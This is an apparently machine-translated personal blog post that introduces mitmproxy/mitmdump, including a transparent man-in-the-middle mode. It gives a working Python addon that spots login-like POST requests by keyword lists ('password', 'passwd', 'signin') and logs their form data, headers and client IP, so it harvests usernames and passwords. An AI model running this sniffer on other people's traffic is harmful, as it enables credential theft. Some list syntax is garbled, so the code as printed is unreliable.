I haven’t written an article for a long time. One is too busy, and the other is that I almost forgot about it. This should be the last post of the year! So today I will talk about some of my recent practice in network packet capture (actually I know very little about the field of network security). Of course, the tool you’re probably most familiar with is Wireshark, which is quite powerful. However, it probably doesn’t support hot plug, so it won’t be able to fully control the package capture. So soon after, Mitmproxy this product came into my sight, with it can easily add custom grab logic Python script, can be said to be very easy to expand, perfect to solve my needs. This is another example of putting this silly programming language into production after writing Keykee.
I suddenly remembered a realization of my two years in this field:
Programmers should sometimes be grateful to people who provide them with requirements.
Mitmdump is a branch of Mitmproxy, which is the core tool for implementing dump according to customized scripts. If you want to play on your own machine, use Regular Mode. A detailed description of Mitmproxy patterns can be found in the official documentation. Here is a schematic of the general pattern:
If there is a man-in-the-middle attack factor, it needs to cooperate with Linux ip_forward and use Mitmdump Transparent Mode, which is invisible to the client:
In general, the conventional and transparent modes satisfy most of the experimental requirements.
Mitmdump can be installed via PIP:
$ pip install mitmproxy
Copy the code
Once installed, you can operate from anywhere using the mitmdump command.
To capture HTTPS requests, you need to import the Mitmproxy root certificate to the system. You can also import the Mitmproxy root certificate in a browser. The default location of the certificate is ~/. Mitmproxy.
Then set the network proxy of the system and set Use the same proxy for all protocols as required. The proxy IP address is 127.0.0.1, and the proxy port is 8080.
In this way, the preparations are ready.
This attempt to write a password sniffing script, as mentioned earlier, it is very scalable!! So I’m going to throw the ball in here.
sniffer.py
import logging
from mitmproxy import http
password_key = ["password"."pwd"."pass"."passwd"."mm"."passport"."auth"."key"."mima"]
form_login_key = ["check"."login"."verify"."account"."logon"."signin"."denglu"]
class Sniffer:
def request(self, flow: http.HTTPFlow):
request = flow.request
url = request.pretty_url
form_url = str(request.urlencoded_form)
if request.method == 'POST':
if self.any_match(form_login_key, url) or self.any_match(password_key, form_url):
self.resolve(flow)
def any_match(self, list, str: str):
lower_str = str.lower()
for i in list:
if i in lower_str:
return True
return False
def resolve(self, flow: http.HTTPFlow):
request = flow.request
url = request.url
_from = str(flow.client_conn.ip_address)
url_form = str(request.urlencoded_form)
header = str(request.headers)
logging.info("url: %s \nheader: %s \nform: %s \nip_from: %s", url, header, url_form, _from)
Copy the code
Mitmdump creates an instance of the Sniffer class and calls the Request (flow) method, which can insert multiple such classes at once by providing a unified entry:
addons.py
from sniffer import Sniffer
addons = [
Sniffer()
# YourSniffer()
#...
]
Copy the code
Finally, run the mitmdump command to capture packets:
$ mitmdump -q -s addons.py --set body-size-limit=10k "~m post"
Copy the code
- -q Shields the mitmdump console logs by default and displays only the logs in its own scripts
- -s Entry script file
- –set body-size-limit= 10K Only handle requests smaller than 10K
- “~m POST “processes only post requests
After the launch of a visit to a relatively poor security of the site, user login operation, and then the console appeared in the user name password and other information, if encrypted, find the front end of the page code to study the encryption method, poor security of the site is easy to understand.
Finally, welcome to my prince’s cabin!
Dear friends, happy New Year:)